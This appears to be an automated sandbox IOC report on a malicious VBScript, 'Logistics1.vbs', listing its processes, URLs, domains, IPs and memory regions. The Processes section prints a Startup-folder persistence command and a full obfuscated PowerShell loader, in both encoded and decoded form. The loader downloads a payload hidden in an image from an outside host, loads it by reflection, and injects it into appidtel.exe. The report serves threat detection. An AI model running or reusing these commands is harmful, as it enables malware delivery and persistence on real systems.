IOC Report
Logistics1.vbs

loading gif

Files

File Path
Type
Category
Malicious
Logistics1.vbs
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zhdkvmj.trw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b44hbydq.r5a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4njhxmt.mxe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwendzpd.511.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2tv5igq.3qj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzmg0ah5.b2y.psm1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Logistics1.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Windows\system32\Logistics1.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etnarugif.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwgPSAnKyd7MCcrJ31odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8nKycyMDI0MTAvRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSAnKydOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQuRG93bmxvYWREYXRhKHsxfWltYWdlVXInKydsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmcnKyddOjpVVEY4LkdldFN0cmluZygnKyd7MX1pbWFnZUJ5dGVzKTsnKyd7MX1zdGFydEZsYWcnKycgPSB7MH08JysnPEJBU0U2NF9TVEEnKydSVD4+ezAnKyd9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnsnKycwfTt7MX1zdCcrJ2FydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9ICcrJ3sxfWltYWdlVGV4dC5JbmRleE9mKHsxfScrJ2VuZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zJysndGFydEluZGV4O3sxfScrJ2JhJysncycrJ2U2NENvbW0nKydhbmQgPSB7MX1pbWFnZVRleHQuUycrJ3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dCcrJ2VzJysnID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfScrJyk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udScrJ2xsLCBAKHswfTAvMkdmMkEvZC9lZS5ldHNhcC8vOnNwdHRoezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MCcrJ31kZScrJ3NhdGl2YWRvezB9LCB7MH1kZXNhdGl2YWRvezB9LCB7MH0xezB9LCB7MH1hcHBpZHRlbHswfSkpOycpIC1mW0NIQVJdMzksW0NIQVJdMzYpfC4oIChbc3RyaU5nXSR2ZVJCb3NlUHJFZkVyZW5jRSlbMSwzXSsneCctSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl = '+'{0'+'}https://ia600102.us.archive.org/32/items/detah-note-v_'+'202410/DetahNote_V.jpg {0};{1}webClient = '+'New-Object System.Net.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding'+']::UTF8.GetString('+'{1}imageBytes);'+'{1}startFlag'+' = {0}<'+'<BASE64_STA'+'RT>>{0'+'};{1}endFlag = {0}<<BASE64_END>>{'+'0};{1}st'+'artIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = '+'{1}imageText.IndexOf({1}'+'endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}s'+'tartIndex;{1}'+'ba'+'s'+'e64Comm'+'and = {1}imageText.S'+'ubstring({1}startIndex, {1}base64Length);{1}commandByt'+'es'+' = [System.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Refl'+'ection.Assemb'+'ly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0}'+');{1}vaiMethod.Invoke({1}nu'+'ll, @({0}0/2Gf2A/d/ee.etsap//:sptth{0}, {0}desativado{0}, {0}desativado{0}, {0'+'}de'+'sativado{0}, {0}desativado{0}, {0}1{0}, {0}appidtel{0}));') -f[CHAR]39,[CHAR]36)|.( ([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"
malicious
C:\Windows\SysWOW64\appidtel.exe
"C:\Windows\SysWOW64\appidtel.exe"
malicious
C:\Windows\SysWOW64\appidtel.exe
"C:\Windows\SysWOW64\appidtel.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
207.241.227.242
malicious
https://ia600102.us.archive.org
unknown
malicious
https://ia600102.us.archive.org/32/items/detah-note-v_
unknown
malicious
https://paste.ee/d/A2fG2/0
188.114.96.3
malicious
https://ia600102.us.archive.org/32/it
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://i0002.us
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://ia600102.us.arX
unknown
https://github.com/Pester/Pester
unknown
http://ia600102.us.archive.org
unknown
https://www.google.com
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://analytics.paste.ee;
unknown
https://cdnjs.cloudflare.com
unknown
https://aka.ms/pscore68
unknown
https://cdnjs.cloudflare.com;
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
unknown
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
There are 24 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ia600102.us.archive.org
207.241.227.242
malicious
paste.ee
188.114.96.3
malicious

IPs

IP
Domain
Country
Malicious
188.114.96.3
paste.ee
European Union
malicious
207.241.227.242
ia600102.us.archive.org
United States
malicious
127.0.0.1
unknown
unknown
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
32F0000
direct allocation
page read and write
malicious
21AE7E31000
trusted library allocation
page read and write
21AFE770000
heap
page read and write
21AE4904000
heap
page read and write
21AE6160000
heap
page readonly
2024D6C6000
heap
page read and write
28E7A033000
heap
page read and write
28E79FDA000
heap
page read and write
19C71F0F000
heap
page read and write
20265C1D000
heap
page read and write
7FFB4A234000
trusted library allocation
page read and write
7FFB4A1E0000
trusted library allocation
page read and write
21AFE843000
heap
page read and write
7FFB49ECD000
trusted library allocation
page execute and read and write
34F9000
direct allocation
page execute and read and write
21AE80BC000
trusted library allocation
page read and write
19C59A80000
heap
page execute and read and write
372C2FE000
stack
page read and write
21AF856A000
trusted library allocation
page read and write
28E78470000
heap
page read and write
372C37E000
stack
page read and write
19C71FD0000
heap
page read and write
21AE4985000
heap
page read and write
19C5A4D4000
trusted library allocation
page read and write
28E79FFA000
heap
page read and write
21AFE9E4000
heap
page read and write
7FFB4A150000
trusted library allocation
page read and write
7FFB4A190000
trusted library allocation
page read and write
7FFB49F7C000
trusted library allocation
page execute and read and write
19C72370000
heap
page read and write
6C0C0BF000
stack
page read and write
28E787CA000
heap
page read and write
21AE7B09000
trusted library allocation
page read and write
21AE6B41000
trusted library allocation
page read and write
28E7A03F000
heap
page read and write
19C57EC9000
heap
page read and write
21AE7E43000
trusted library allocation
page read and write
2024D600000
heap
page read and write
28E7A02B000
heap
page read and write
28E7A030000
heap
page read and write
21AE6500000
trusted library allocation
page read and write
2E79000
heap
page read and write
2B3287C000
stack
page read and write
28E7A00E000
heap
page read and write
2024DF66000
trusted library allocation
page read and write
21AE7747000
trusted library allocation
page read and write
21AE6170000
trusted library allocation
page read and write
6C0C33E000
stack
page read and write
21AE4884000
heap
page read and write
7FFB49F60000
trusted library allocation
page read and write
2B328FF000
stack
page read and write
7FFB49F7C000
trusted library allocation
page execute and read and write
21AF692A000
trusted library allocation
page read and write
372C27E000
stack
page read and write
7FFB4A130000
trusted library allocation
page read and write
7FFB4A200000
trusted library allocation
page read and write
28E784FF000
heap
page read and write
28E7A030000
heap
page read and write
2024BC60000
trusted library allocation
page read and write
28E784C7000
heap
page read and write
19C5A392000
trusted library allocation
page read and write
28E7A50C000
heap
page read and write
28E7A012000
heap
page read and write
2024BD88000
heap
page read and write
21AE6CE3000
trusted library allocation
page read and write
2024D6C0000
heap
page read and write
2E7A000
heap
page read and write
7FFB4A090000
trusted library allocation
page execute and read and write
19C71E7D000
heap
page read and write
7FFB4A07A000
trusted library allocation
page read and write
2B3297E000
stack
page read and write
7FFB4A100000
trusted library allocation
page read and write
28E787C8000
heap
page read and write
7FFB4A071000
trusted library allocation
page read and write
2B32DBF000
stack
page read and write
3712000
direct allocation
page execute and read and write
21AE49A7000
heap
page read and write
28E78589000
heap
page read and write
2025DBD0000
trusted library allocation
page read and write
3352000
heap
page read and write
28E79FA2000
heap
page read and write
28E7A581000
heap
page read and write
372C7BC000
stack
page read and write
21AE48D3000
heap
page read and write
2F94000
heap
page read and write
7FFB4A1D0000
trusted library allocation
page read and write
19C57E10000
heap
page read and write
19C5A1AE000
trusted library allocation
page read and write
21AF6751000
trusted library allocation
page read and write
21AE6D0B000
trusted library allocation
page read and write
21AE61B6000
heap
page read and write
28E784C6000
heap
page read and write
7FFB4A264000
trusted library allocation
page read and write
381F000
stack
page read and write
2024BD86000
heap
page read and write
7FFB4A0F0000
trusted library allocation
page read and write
2024BC80000
trusted library allocation
page read and write
7FFB4A060000
trusted library allocation
page read and write
19C5A6CC000
trusted library allocation
page read and write
2BEC000
stack
page read and write
3990000
heap
page read and write
2024BD14000
heap
page read and write
21AE48B0000
trusted library allocation
page read and write
319C000
heap
page read and write
21AE4840000
heap
page read and write
2F94000
heap
page read and write
28E78589000
heap
page read and write
2B326FE000
stack
page read and write
7FFB49F70000
trusted library allocation
page execute and read and write
19C58090000
heap
page readonly
7FFB4A200000
trusted library allocation
page read and write
19C58060000
trusted library allocation
page read and write
21AF6F46000
trusted library allocation
page read and write
21AE6720000
heap
page execute and read and write
7FFB4A1A0000
trusted library allocation
page read and write
28E7A130000
heap
page read and write
2024DB7A000
trusted library allocation
page read and write
28E7A034000
heap
page read and write
28E7853C000
heap
page read and write
372C8BE000
stack
page read and write
7FFB4A1C0000
trusted library allocation
page read and write
28E7A4CB000
heap
page read and write
20265C3C000
heap
page read and write
372D38E000
stack
page read and write
28E784BA000
heap
page read and write
19C59F51000
trusted library allocation
page read and write
7FFB4A0C0000
trusted library allocation
page read and write
19C57EDD000
heap
page read and write
28E7A036000
heap
page read and write
28E784BB000
heap
page read and write
28E78543000
heap
page read and write
28E787CE000
heap
page read and write
7FFB4A140000
trusted library allocation
page read and write
6C0BDFE000
stack
page read and write
372C6B7000
stack
page read and write
6C0C13E000
stack
page read and write
7FFB49F66000
trusted library allocation
page read and write
19C57EBD000
heap
page read and write
19C69EB1000
trusted library allocation
page read and write
19C59E8A000
trusted library allocation
page read and write
7FFB49EDC000
trusted library allocation
page read and write
2024DCAC000
trusted library allocation
page read and write
32AE000
stack
page read and write
334E000
heap
page read and write
28E79FD1000
heap
page read and write
20265B60000
heap
page read and write
7FFB4A0B0000
trusted library allocation
page execute and read and write
3071000
heap
page read and write
28E78553000
heap
page read and write
2B32BB9000
stack
page read and write
28E79FEA000
heap
page read and write
2024DF1C000
trusted library allocation
page read and write
28E7A030000
heap
page read and write
21AE833C000
trusted library allocation
page read and write
6C0C3BE000
stack
page read and write
28E79FB6000
heap
page read and write
28E78589000
heap
page read and write
3340000
direct allocation
page read and write
E3206F6000
stack
page read and write
21AE48FE000
heap
page read and write
2024BC55000
heap
page read and write
7FFB4A1B0000
trusted library allocation
page read and write
7FFB49ECD000
trusted library allocation
page execute and read and write
7FFB4A080000
trusted library allocation
page execute and read and write
21AE6B3C000
trusted library allocation
page read and write
7FFB4A080000
trusted library allocation
page execute and read and write
3071000
heap
page read and write
19C57E50000
heap
page read and write
21AE48C9000
heap
page read and write
19C720C0000
heap
page read and write
7FFB49EC3000
trusted library allocation
page execute and read and write
2B32EBC000
stack
page read and write
2024BAD0000
heap
page read and write
19C57EC3000
heap
page read and write
19C71E9F000
heap
page read and write
7FFB4A220000
trusted library allocation
page read and write
7FFB49EC0000
trusted library allocation
page read and write
19C59A60000
heap
page execute and read and write
19C5A3F5000
trusted library allocation
page read and write
2B32673000
stack
page read and write
20266180000
heap
page read and write
19C57EBF000
heap
page read and write
7FFB49EE0000
trusted library allocation
page read and write
21AFE757000
heap
page read and write
7FFB4A0B0000
trusted library allocation
page execute and read and write
21AE6B49000
trusted library allocation
page read and write
2BAD000
stack
page read and write
7FFB49EC3000
trusted library allocation
page execute and read and write
28E7A031000
heap
page read and write
2024E031000
trusted library allocation
page read and write
7FFB4A1D0000
trusted library allocation
page read and write
2024BC90000
heap
page read and write
2E70000
heap
page read and write
28E79FB1000
heap
page read and write
2B32E3E000
stack
page read and write
2F90000
heap
page read and write
19C58157000
heap
page execute and read and write
2024BCDE000
heap
page read and write
2024E09D000
trusted library allocation
page read and write
7DF4BC4F0000
trusted library allocation
page execute and read and write
7FFB4A210000
trusted library allocation
page read and write
19C71EEF000
heap
page read and write
28E7A034000
heap
page read and write
28E787CA000
heap
page read and write
20265BB5000
heap
page read and write
28E7A4F9000
heap
page read and write
2024DECF000
trusted library allocation
page read and write
28E7A030000
heap
page read and write
7FFB4A1A0000
trusted library allocation
page read and write
21AE8406000
trusted library allocation
page read and write
7FFB4A190000
trusted library allocation
page read and write
2024BD63000
heap
page read and write
28E787C5000
heap
page read and write
19C59F4E000
trusted library allocation
page read and write
7FFB4A130000
trusted library allocation
page read and write
7FFB4A061000
trusted library allocation
page read and write
28E78589000
heap
page read and write
21AF67C1000
trusted library allocation
page read and write
28E787CA000
heap
page read and write
7FFB4A0A2000
trusted library allocation
page read and write
6C0BFFE000
stack
page read and write
28E79FAA000
heap
page read and write
34FD000
direct allocation
page execute and read and write
28E7A01A000
heap
page read and write
7FFB49F6C000
trusted library allocation
page execute and read and write
28E7A036000
heap
page read and write
7FFB4A190000
trusted library allocation
page read and write
2024D5B0000
trusted library allocation
page read and write
356E000
direct allocation
page execute and read and write
7FFB4A0A2000
trusted library allocation
page read and write
19C71EF5000
heap
page read and write
19C58110000
trusted library allocation
page read and write
7FFB49EC2000
trusted library allocation
page read and write
21AE6596000
heap
page read and write
28E78589000
heap
page read and write
28E7A502000
heap
page read and write
372D40E000
stack
page read and write
21AF6A4A000
trusted library allocation
page read and write
2024E17A000
trusted library allocation
page read and write
19C58080000
trusted library allocation
page read and write
2F94000
heap
page read and write
19C59EA9000
trusted library allocation
page read and write
28E79FC9000
heap
page read and write
20265C19000
heap
page read and write
20265C27000
heap
page read and write
2024BCCE000
heap
page read and write
20265C80000
heap
page execute and read and write
2B32A77000
stack
page read and write
2024BCD6000
heap
page read and write
19C5A2E9000
trusted library allocation
page read and write
7FFB49FA6000
trusted library allocation
page execute and read and write
7FFB4A1A0000
trusted library allocation
page read and write
21AE490A000
heap
page read and write
2B32D3E000
stack
page read and write
21AF6A3B000
trusted library allocation
page read and write
28E79FCE000
heap
page read and write
21AFE8E0000
heap
page read and write
19C71F28000
heap
page read and write
21AE7E19000
trusted library allocation
page read and write
21AE7E3F000
trusted library allocation
page read and write
372C83E000
stack
page read and write
28E79FBE000
heap
page read and write
2024BC10000
heap
page read and write
20265BBB000
heap
page read and write
7FFB4A1F0000
trusted library allocation
page read and write
6C0C43C000
stack
page read and write
20265C52000
heap
page read and write
7FFB49EB4000
trusted library allocation
page read and write
21AE6CFD000
trusted library allocation
page read and write
19C581A5000
heap
page read and write
28E79FA0000
heap
page read and write
28E7A009000
heap
page read and write
2025DB61000
trusted library allocation
page read and write
7FFB49FE0000
trusted library allocation
page execute and read and write
19C57DE0000
heap
page read and write
19C71E6F000
heap
page read and write
2024DB83000
trusted library allocation
page read and write
28E7A00F000
heap
page read and write
19C71E9D000
heap
page read and write
E320CFE000
stack
page read and write
21AE61BA000
heap
page read and write
21AFEA40000
heap
page read and write
21AE4880000
heap
page read and write
19C581A0000
heap
page read and write
19C71F2D000
heap
page read and write
7FFB4A120000
trusted library allocation
page read and write
7FFB4A1E0000
trusted library allocation
page read and write
21AE7D81000
trusted library allocation
page read and write
19C59F54000
trusted library allocation
page read and write
E320AFF000
stack
page read and write
20265C42000
heap
page read and write
21AE4946000
heap
page read and write
6C0BE7D000
stack
page read and write
7FFB4A050000
trusted library allocation
page read and write
28E7A046000
heap
page read and write
19C71F17000
heap
page read and write
21AFE805000
heap
page read and write
19C69E50000
trusted library allocation
page read and write
7FFB4A25C000
trusted library allocation
page read and write
28E7A481000
heap
page read and write
2024BBB0000
heap
page read and write
2024BCEE000
heap
page read and write
372C738000
stack
page read and write
21AE4700000
heap
page read and write
28E79FC6000
heap
page read and write
21AE8035000
trusted library allocation
page read and write
28E7A017000
heap
page read and write
7FFB4A092000
trusted library allocation
page read and write
2B32ABE000
stack
page read and write
21AE6740000
heap
page execute and read and write
7FFB49EC4000
trusted library allocation
page read and write
19C69E41000
trusted library allocation
page read and write
7FFB4A062000
trusted library allocation
page read and write
21AE67D1000
trusted library allocation
page read and write
21AE491E000
heap
page read and write
2B32C3B000
stack
page read and write
7FFB4A160000
trusted library allocation
page read and write
28E7A030000
heap
page read and write
21AE4890000
trusted library allocation
page read and write
6C0BF7E000
stack
page read and write
3340000
direct allocation
page read and write
7FFB4A170000
trusted library allocation
page read and write
28E7A508000
heap
page read and write
2B327FF000
stack
page read and write
7FFB4A150000
trusted library allocation
page read and write
21AE8402000
trusted library allocation
page read and write
28E78460000
heap
page read and write
28E78547000
heap
page read and write
7FFB4A0E0000
trusted library allocation
page read and write
2025DB71000
trusted library allocation
page read and write
19C57F05000
heap
page read and write
2024DC67000
trusted library allocation
page read and write
28E79FB9000
heap
page read and write
7FFB4A1F0000
trusted library allocation
page read and write
7FFB4A100000
trusted library allocation
page read and write
36A1000
direct allocation
page execute and read and write
7FFB4A270000
trusted library allocation
page read and write
20265E00000
heap
page read and write
28E787CD000
heap
page read and write
28E7A5DE000
heap
page read and write
21AF7005000
trusted library allocation
page read and write
19C59AE0000
heap
page read and write
19C59F9F000
trusted library allocation
page read and write
28E7A480000
heap
page read and write
28E7A046000
heap
page read and write
28E787C0000
heap
page read and write
7FFB4A0F0000
trusted library allocation
page read and write
28E79FFD000
heap
page read and write
21AE8082000
trusted library allocation
page read and write
7FFB49F76000
trusted library allocation
page read and write
372C3FD000
stack
page read and write
21AF6760000
trusted library allocation
page read and write
7FFB4A0E0000
trusted library allocation
page read and write
7FFB4A231000
trusted library allocation
page read and write
E3207FE000
stack
page read and write
7FFB49EB3000
trusted library allocation
page execute and read and write
7FFB4A090000
trusted library allocation
page execute and read and write
28E79FD5000
heap
page read and write
7FFB4A070000
trusted library allocation
page execute and read and write
28E7A048000
heap
page read and write
7FFB4A1B0000
trusted library allocation
page read and write
19C5A346000
trusted library allocation
page read and write
21AE6580000
heap
page read and write
7FFB49EBD000
trusted library allocation
page execute and read and write
19C57E80000
heap
page read and write
2E75000
heap
page read and write
28E787CE000
heap
page read and write
21AF67CD000
trusted library allocation
page read and write
7FFB4A160000
trusted library allocation
page read and write
19C71E45000
heap
page read and write
7FFB4A170000
trusted library allocation
page read and write
21AE61B0000
heap
page read and write
19C58150000
heap
page execute and read and write
21AE7E6B000
trusted library allocation
page read and write
7FFB49EC4000
trusted library allocation
page read and write
21AE6D37000
trusted library allocation
page read and write
19C57E92000
heap
page read and write
20265C86000
heap
page execute and read and write
2024BC50000
heap
page read and write
28E784CF000
heap
page read and write
369D000
direct allocation
page execute and read and write
28E78589000
heap
page read and write
3340000
direct allocation
page read and write
7FFB4A100000
trusted library allocation
page read and write
21AE6B6F000
trusted library allocation
page read and write
21AE6751000
trusted library allocation
page read and write
2E80000
heap
page read and write
28E7A4F9000
heap
page read and write
7FFB4A120000
trusted library allocation
page read and write
19C59E41000
trusted library allocation
page read and write
21AE7E67000
trusted library allocation
page read and write
28E79FDD000
heap
page read and write
21AE61B4000
heap
page read and write
28E78543000
heap
page read and write
21AF6F49000
trusted library allocation
page read and write
28E79FA1000
heap
page read and write
7FFB49F96000
trusted library allocation
page execute and read and write
3225000
heap
page read and write
28E7A030000
heap
page read and write
7FFB4A0B0000
trusted library allocation
page read and write
19C5A2C8000
trusted library allocation
page read and write
19C59AF5000
heap
page read and write
28E78554000
heap
page read and write
7FFB4A170000
trusted library allocation
page read and write
28E78548000
heap
page read and write
7FFB4A1E0000
trusted library allocation
page read and write
7FFB4A071000
trusted library allocation
page read and write
2024DC5D000
trusted library allocation
page read and write
20265D20000
heap
page read and write
7FFB49F80000
trusted library allocation
page execute and read and write
3079000
heap
page read and write
28E7A503000
heap
page read and write
2E40000
heap
page read and write
7FFB4A181000
trusted library allocation
page read and write
2024DC4F000
trusted library allocation
page read and write
7FFB49FD0000
trusted library allocation
page execute and read and write
372D48D000
stack
page read and write
2024DCA0000
trusted library allocation
page read and write
28E7A036000
heap
page read and write
2024D530000
heap
page readonly
21AE6530000
trusted library allocation
page read and write
7FFB4A110000
trusted library allocation
page read and write
2024E05C000
trusted library allocation
page read and write
28E7A03E000
heap
page read and write
6C0C2BF000
stack
page read and write
28E7A030000
heap
page read and write
2024BD56000
heap
page read and write
28E7854A000
heap
page read and write
7FFB4A26C000
trusted library allocation
page read and write
21AFE79A000
heap
page read and write
7FFB49EB2000
trusted library allocation
page read and write
21AE48C0000
heap
page read and write
2B32B36000
stack
page read and write
19C59EC2000
trusted library allocation
page read and write
7FFB4A0A0000
trusted library allocation
page execute and read and write
28E787C8000
heap
page read and write
7FFB4A052000
trusted library allocation
page read and write
21AE4800000
heap
page read and write
372C9BB000
stack
page read and write
19C71E40000
heap
page read and write
7FFB49F1C000
trusted library allocation
page execute and read and write
2024DC61000
trusted library allocation
page read and write
28E7A4CC000
heap
page read and write
2024DC6A000
trusted library allocation
page read and write
19C59EDC000
trusted library allocation
page read and write
2B3277E000
stack
page read and write
7FFB49FE0000
trusted library allocation
page execute and read and write
20265BAE000
heap
page read and write
28E7854C000
heap
page read and write
7FFB4A210000
trusted library allocation
page read and write
28E78583000
heap
page read and write
2024BC9A000
heap
page read and write
28E7A4F8000
heap
page read and write
7FFB49EB0000
trusted library allocation
page read and write
7FFB4A1B0000
trusted library allocation
page read and write
3340000
direct allocation
page read and write
7FFB4A130000
trusted library allocation
page read and write
21AFED80000
trusted library section
page read and write
7FFB4A150000
trusted library allocation
page read and write
7FFB4A0D0000
trusted library allocation
page read and write
2024DF1A000
trusted library allocation
page read and write
19C59F98000
trusted library allocation
page read and write
28E787CE000
heap
page read and write
6C0C07E000
stack
page read and write
2B32CBE000
stack
page read and write
28E7A036000
heap
page read and write
6C0BEFE000
stack
page read and write
7FFB49F70000
trusted library allocation
page read and write
28E7A036000
heap
page read and write
19C57ECB000
heap
page read and write
19C59E5F000
trusted library allocation
page read and write
21AFE761000
heap
page read and write
2E7F000
heap
page read and write
21AFE900000
heap
page read and write
28E7A5DF000
heap
page read and write
372C63E000
stack
page read and write
20265C14000
heap
page read and write
19C59F62000
trusted library allocation
page read and write
7FFB4A180000
trusted library allocation
page read and write
28E7A01F000
heap
page read and write
28E79FC1000
heap
page read and write
2E77000
heap
page read and write
7FFB49F76000
trusted library allocation
page read and write
372BFF3000
stack
page read and write
7FFB4A06A000
trusted library allocation
page read and write
33C3000
heap
page read and write
28E79FEE000
heap
page read and write
7FFB4A180000
trusted library allocation
page read and write
7FFB4A110000
trusted library allocation
page read and write
19C59E5B000
trusted library allocation
page read and write
E320DFE000
stack
page read and write
28E7A046000
heap
page read and write
372C47E000
stack
page read and write
31AD000
stack
page read and write
28E787CE000
heap
page read and write
21AFE7A3000
heap
page read and write
28E79FF1000
heap
page read and write
28E78585000
heap
page read and write
28E787CC000
heap
page read and write
28E78490000
heap
page read and write
7FFB4A140000
trusted library allocation
page read and write
7FFB49ECB000
trusted library allocation
page read and write
7FFB4A074000
trusted library allocation
page read and write
19C59AF0000
heap
page read and write
7FFB4A080000
trusted library allocation
page execute and read and write
33D0000
direct allocation
page execute and read and write
E320FFE000
stack
page read and write
372C57E000
stack
page read and write
E320BFF000
stack
page read and write
7FFB49F70000
trusted library allocation
page read and write
21AFE8D0000
heap
page execute and read and write
19C57DF0000
heap
page read and write
21AE6972000
trusted library allocation
page read and write
21AE48E7000
heap
page read and write
21AE6B43000
trusted library allocation
page read and write
7FFB49FA6000
trusted library allocation
page execute and read and write
7FFB49ED0000
trusted library allocation
page read and write
28E7A030000
heap
page read and write
21AE8061000
trusted library allocation
page read and write
7FFB4A110000
trusted library allocation
page read and write
372C4FE000
stack
page read and write
3070000
heap
page read and write
3170000
direct allocation
page read and write
7FFB4A0C0000
trusted library allocation
page read and write
2B329FF000
stack
page read and write
E3210FB000
stack
page read and write
28E7A012000
heap
page read and write
21AE6B4D000
trusted library allocation
page read and write
28E7A046000
heap
page read and write
21AE7E1F000
trusted library allocation
page read and write
28E7A580000
heap
page read and write
2024E16E000
trusted library allocation
page read and write
